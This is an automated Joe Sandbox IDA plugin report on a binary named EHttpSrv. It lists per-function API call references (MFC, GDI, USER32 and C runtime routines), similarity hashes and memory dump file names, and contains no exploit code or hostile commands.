                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578MessageSend$#1176#2011#2155#2311#310#359#3828#3998#5832#607#6735memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2206005235-0
                                                                                                                • Opcode ID: 5d98db17271ceefec40e4686cedd3b400c23290e0028667f441ba2ae5cb3a62e
                                                                                                                • Instruction ID: a991864db3a0a3185713833567a21807db3ec07bc176c53f6d209b427fa1a97f
                                                                                                                • Opcode Fuzzy Hash: 5d98db17271ceefec40e4686cedd3b400c23290e0028667f441ba2ae5cb3a62e
                                                                                                                • Instruction Fuzzy Hash: 925194712187819FC320DBB4C891FEBB7E5BB54718F008A2DE5A9876D1DB38A904C792
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20437980: CopyRect.USER32(?,?), ref: 204379CC
                                                                                                                  • Part of subcall function 20437980: #310.MFC80U(?,?,?,?), ref: 204379D6
                                                                                                                  • Part of subcall function 20437980: SendMessageW.USER32(00000020,00001200,00000000,00000000), ref: 20437A02
                                                                                                                  • Part of subcall function 20437980: #578.MFC80U ref: 20437A18
                                                                                                                • SetTextColor.GDI32(?,?), ref: 20438333
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 20438363
                                                                                                                • GetObjectW.GDI32(00000000,0000005C,?), ref: 20438375
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 2043838C
                                                                                                                • #1271.MFC80U(00000000), ref: 20438395
                                                                                                                • SelectObject.GDI32(?), ref: 204383B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$#1271#310#578ColorCopyCreateCurrentFontIndirectMessageRectSelectSendText
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284396756-0
                                                                                                                • Opcode ID: 8705216cc76b13d0f737ef574a491e92388a5e8e7d4070be1353ec410c3028ca
                                                                                                                • Instruction ID: 484de9f246bdf82a8301fbaf3a63fc84f0942e2abdd496c54fb230ee13603b97
                                                                                                                • Opcode Fuzzy Hash: 8705216cc76b13d0f737ef574a491e92388a5e8e7d4070be1353ec410c3028ca
                                                                                                                • Instruction Fuzzy Hash: 7C41D6B22007019BD720CFA4D885B67F7E4FF89754F208A1DEA5587B91DB39E904CB51
                                                                                                                APIs
                                                                                                                • #2361.MFC80U(?), ref: 204544CA
                                                                                                                • #2860.MFC80U(00000000,?), ref: 204544E2
                                                                                                                • #3396.MFC80U(00000000,00000000,00000000,?,00000000,?), ref: 20454535
                                                                                                                • #3396.MFC80U(00000000,00000000,00000001,?,00000000,00000000,00000000,?,00000000,?), ref: 2045454A
                                                                                                                • SendMessageW.USER32(?,00001000,00000000,00000000), ref: 20454567
                                                                                                                • #2255.MFC80U(?,00000000), ref: 20454579
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3396$#2255#2361#2860MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1954174168-0
                                                                                                                • Opcode ID: cb7de2568d13e4670ff08f8d41b71d634ad4678d3c454fbf4b0aead7b3e26e92
                                                                                                                • Instruction ID: c5855179c074373f60ae8c677f0082ddd0828e8fe3e3ea2248cd01ddea852f80
                                                                                                                • Opcode Fuzzy Hash: cb7de2568d13e4670ff08f8d41b71d634ad4678d3c454fbf4b0aead7b3e26e92
                                                                                                                • Instruction Fuzzy Hash: 2541A272204205AFC304CF58D880FAAF7E5EBD8324F00C62EFA499B291D675E849CB91
                                                                                                                APIs
                                                                                                                • #2361.MFC80U(?), ref: 2046061A
                                                                                                                • #2860.MFC80U(00000000,?), ref: 20460632
                                                                                                                • #3396.MFC80U(00000000,00000000,00000000,?,00000000,?), ref: 20460685
                                                                                                                • #3396.MFC80U(00000000,00000000,00000001,?,00000000,00000000,00000000,?,00000000,?), ref: 2046069A
                                                                                                                • SendMessageW.USER32(?,00001000,00000000,00000000), ref: 204606B7
                                                                                                                • #2255.MFC80U(?,00000000), ref: 204606C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3396$#2255#2361#2860MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1954174168-0
                                                                                                                • Opcode ID: 958238bf71ac4715f8ddfb8c01e7def0aeec5b4875cd1fe542732df0f3a72233
                                                                                                                • Instruction ID: 126db6bb1b3f769ee96d377db79cbabebc7581eef1bc95ec5cdcf709eca0c113
                                                                                                                • Opcode Fuzzy Hash: 958238bf71ac4715f8ddfb8c01e7def0aeec5b4875cd1fe542732df0f3a72233
                                                                                                                • Instruction Fuzzy Hash: 6B418F722042056FC304CF68D880FABB7E5EB98324F00C66DFA599B291DA74E845CB91
                                                                                                                APIs
                                                                                                                • wcschr.MSVCR80 ref: 20402E94
                                                                                                                • wcschr.MSVCR80 ref: 20402EA2
                                                                                                                • wcschr.MSVCR80 ref: 20402EB5
                                                                                                                • wcschr.MSVCR80 ref: 20402EC3
                                                                                                                • wcschr.MSVCR80 ref: 20402ED4
                                                                                                                • memcpy.MSVCR80(?,?,?), ref: 20402F21
                                                                                                                  • Part of subcall function 20402BB0: wcschr.MSVCR80 ref: 20402BDC
                                                                                                                  • Part of subcall function 20402BB0: realloc.MSVCR80 ref: 20402C0E
                                                                                                                  • Part of subcall function 20402BB0: free.MSVCR80 ref: 20402C6B
                                                                                                                Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: wcschr$freememcpyrealloc
• String ID:
• API String ID: 167584904-0
• Opcode ID: 79e9b2ff87d29b74a77624e85320ed0fe6e6514f70e8057716c5544e99aabd57
• Instruction ID: 3d209cc773c25d1276801a86a55cdadc7f4b325e4ec272aeb9d5ae2cd2e00bf9
• Opcode Fuzzy Hash: 79e9b2ff87d29b74a77624e85320ed0fe6e6514f70e8057716c5544e99aabd57
• Instruction Fuzzy Hash: 5131A7716043055BD714DEA5DD81BBBB3E9DF94645F00843CFE48A7381E678AE0586A2
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #4026$#314#6751
• String ID:
• API String ID: 624441723-0
• Opcode ID: 7c2ac32a584af543b31e7d4ba2eba0a92f74952405558f1ebb88d8a70f75d7cd
• Instruction ID: 80e23fc9a9e5395550071c8955333a20239846f9909a3b99e3d10eb53f791a7a
• Opcode Fuzzy Hash: 7c2ac32a584af543b31e7d4ba2eba0a92f74952405558f1ebb88d8a70f75d7cd
• Instruction Fuzzy Hash: 1F41C071A087019FE310CF98C8C5BAAB7E0FB84764F44CA2DE9555B7D0DB39A905CB61
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #2579#280#3793#578ClientScreenwcsncpy_s
• String ID:
• API String ID: 3590633572-0
• Opcode ID: 3061a5369420997e25cd18ecfc2a179ae1df2e6ddf54eae5e46729ca15c6e81d
• Instruction ID: fa1ad2b7282cafb1daa863134dea4cd9b2a47bc730152b5a941792659c6a9c33
• Opcode Fuzzy Hash: 3061a5369420997e25cd18ecfc2a179ae1df2e6ddf54eae5e46729ca15c6e81d
• Instruction Fuzzy Hash: 2C317E715087029BD304DF58CC45B5ABBE8EB89728F20CA2DF86593391EB39E944CE56
APIs
• GetObjectW.GDI32(?,0000005C,?), ref: 20421636
  • Part of subcall function 20421700: wcscpy_s.MSVCR80 ref: 204217EF
• GetObjectW.GDI32(?,0000005C,?), ref: 20421656
• GetObjectW.GDI32(?,0000005C,?), ref: 2042167A
• #762.MFC80U(00000008,FEEA6C22,?,?,?), ref: 2042168D
• CreateFontIndirectW.GDI32(?), ref: 204216C4
• #1271.MFC80U(00000000), ref: 204216CD
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: Object$#1271#762CreateFontIndirectwcscpy_s
• String ID:
• API String ID: 59788365-0
• Opcode ID: 6707239445c955c7e539035827d95cdf433977ea8fd111f2add55a54eca427fa
• Instruction ID: 4e5803fff410f36f8d1a55258727d8a2190b7b04d5b7813e904d9cd8e91b01ee
• Opcode Fuzzy Hash: 6707239445c955c7e539035827d95cdf433977ea8fd111f2add55a54eca427fa
• Instruction Fuzzy Hash: 7B314D716087459FD720CF64D881FABB7E9FB94604F00892DF64997290DB78E909CBA2
APIs
  • Part of subcall function 20423790: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C6F,204280D9,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF), ref: 204237B7
• #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
• #557.MFC80U ref: 20430E0A
• #310.MFC80U ref: 20430E17
• #557.MFC80U ref: 20430E25
• LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
• SetRectEmpty.USER32(?), ref: 20430F17
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #310#557$#572CursorEmptyLoadRect
• String ID:
• API String ID: 3215843377-0
• Opcode ID: cb476f6742f4f7be8deaae5ffae4be086f958656c7a3645eb977df059f44e975
• Instruction ID: 2bb2124f3408417cacaab87f7974d43fdc1ced6e54dd9e3e44e2c068e37398bd
• Opcode Fuzzy Hash: cb476f6742f4f7be8deaae5ffae4be086f958656c7a3645eb977df059f44e975
• Instruction Fuzzy Hash: 5A41E7B1408B818ED321CF79C885B87FBE4BB65714F548D1EE1EA83251CB786148CBA2
APIs
• #314.MFC80U(00000000,FEEA6C22), ref: 20443278
• #2310.MFC80U(?,00000161,00000004), ref: 204432AA
• #4026.MFC80U(0000015E), ref: 204432BD
• #5149.MFC80U(00000000), ref: 204432C7
• #5149.MFC80U(00000000), ref: 204432D4
  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
• #6751.MFC80U(00000000,?), ref: 2044332A
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #5149#6751$#2310#314#4026
• String ID:
• API String ID: 1935839213-0
• Opcode ID: a839281dc79383c955cb29c32a29cefc9a3d5eff2f851f3a21d5c4233857ed16
• Instruction ID: 95da39ba3c92a4bc929dfcd721f6019bdc6ab8c86110e5e0e6207edb284bf60f
• Opcode Fuzzy Hash: a839281dc79383c955cb29c32a29cefc9a3d5eff2f851f3a21d5c4233857ed16
• Instruction Fuzzy Hash: 7B31BF726087009BE700CF54DC85B5ABBE4FB94B2AF00C62DFA519B3D0EB399904CB95
APIs
• #5829.MFC80U ref: 20438653
• #3342.MFC80U ref: 2043866B
• GetScrollPos.USER32(?,00000002), ref: 20438679
• GetClientRect.USER32(?,?), ref: 204386CB
• #6061.MFC80U(00000000,?,00000003,00000000,00000000,00000015), ref: 204386E8
• #5053.MFC80U(?,?,?,00000000,?,00000003,00000000,00000000,00000015), ref: 204386FF
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #3342#5053#5829#6061ClientRectScroll
• String ID:
• API String ID: 3428498704-0
• Opcode ID: 510ea35aade66fe04555974c49d38585692205ebdea659769a8c91a3b845935b
• Instruction ID: faa25bfa3efe4b003f9fa37e8d05ddedd5c73f56c3e317c5f132f19a95779bc4
• Opcode Fuzzy Hash: 510ea35aade66fe04555974c49d38585692205ebdea659769a8c91a3b845935b
• Instruction Fuzzy Hash: 4121C772204700AFD314DF65CC86F6AB7AABBC8718F20C61DF95597690EE78AD018752
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #1176#310#3756#578#774#776
• String ID:
• API String ID: 1501068398-0
• Opcode ID: 91aa2c8e6c1f7e646a1858a9b7e0583eb1c2fc4c340d20cd71adb63df5d13810
• Instruction ID: 534fe2c38459ee26a4300b236243343f8cf4d76be2ead2851599a08232dda2c4
• Opcode Fuzzy Hash: 91aa2c8e6c1f7e646a1858a9b7e0583eb1c2fc4c340d20cd71adb63df5d13810
• Instruction Fuzzy Hash: 4A214F71508B419FC714DF58D880B4AB7E4FF98728F108B2DF866933A1DB38A909CB91
APIs
• #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C964
• #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C974
• #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C990
• #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9AC
• #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9C8
• #764.MFC80U(?,FEEA6C22,?,?,2047BB2C,000000FF,2040E34E,?,?,?,?,20464AC2,?,?,?,?), ref: 2040C9E7
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 2b07dee99d85256ead5c4b3a1e0c4762968547d79fd58e5faf9f8336b2089ed3
• Instruction ID: f65c931a0d252e298a1c7162bb7c7cfd43a9f6234d6beb007c26361baf17acd5
                                                                                                                • Opcode Fuzzy Hash: 2b07dee99d85256ead5c4b3a1e0c4762968547d79fd58e5faf9f8336b2089ed3
                                                                                                                • Instruction Fuzzy Hash: 0B216DF19047808BD721DFA48841B57B7E8AF10A18F40CE2DE89997790E37DE608CBD2
APIs
• #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 2046407B
• #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464094
• #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640B3
• #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640D8
• #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640FD
• #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464122
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: 21bc7dc6c0a5576b8b1e108272b6e18468e01767883acd5b2ffdba6672f1f9ac
• Instruction ID: e585b21587b3ce3f0501f9cf68ed5c0128c1d7ad264244d93a85d520306c797b
• Opcode Fuzzy Hash: 21bc7dc6c0a5576b8b1e108272b6e18468e01767883acd5b2ffdba6672f1f9ac
• Instruction Fuzzy Hash: 232194F1901B108BD6219FAA9841B97F6F9AFA0600F548D1EE1AED3224E779B4448F51
APIs
• #1921.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 20460090
• #1921.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 2046009D
  • Part of subcall function 20431180: DestroyCursor.USER32(?), ref: 204311C1
  • Part of subcall function 20431180: #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
  • Part of subcall function 20431180: #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
  • Part of subcall function 20431180: #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
  • Part of subcall function 20431180: #745.MFC80U ref: 20431250
  • Part of subcall function 20431180: #578.MFC80U ref: 2043125D
  • Part of subcall function 20431180: #741.MFC80U ref: 2043126D
  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
• #651.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 204600D9
• #651.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 204600E5
• #658.MFC80U(FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?,00000000,2047F476,000000FF,2046254B), ref: 204600F5
• #718.MFC80U(?,00000004,00000002,6C4E60B9,FEEA6C22,00000000,?,?,?,00000000,2047DB16,000000FF,20470C33,FEEA6C22,-00003AB4,?), ref: 2046011F
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #1921#578#651#745$#6003#658#718#722#741#764CursorDestroyfree
• String ID:
• API String ID: 2094964046-0
• Opcode ID: 45e935d5c378266e553fa27c6ea45fee95c4babfb8c822c790624cf8745d6752
• Instruction ID: 97fa06e62d3a3789af2fe61a12c763a3e0c8e09cd1a0fd74276bfca5eb1cd016
• Opcode Fuzzy Hash: 45e935d5c378266e553fa27c6ea45fee95c4babfb8c822c790624cf8745d6752
• Instruction Fuzzy Hash: EB21C2701487818ED315DF65C851BABBBE4EBA4718F40C91DF0A647291CB7D690DCFA2
APIs
• #310.MFC80U(FEEA6C22), ref: 2044A62B
• FileTimeToSystemTime.KERNEL32(?,?), ref: 2044A64D
• GetDateFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000100), ref: 2044A66F
• #2310.MFC80U(?,?,?), ref: 2044A68B
• #896.MFC80U(?), ref: 2044A69C
• #578.MFC80U ref: 2044A6B1
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
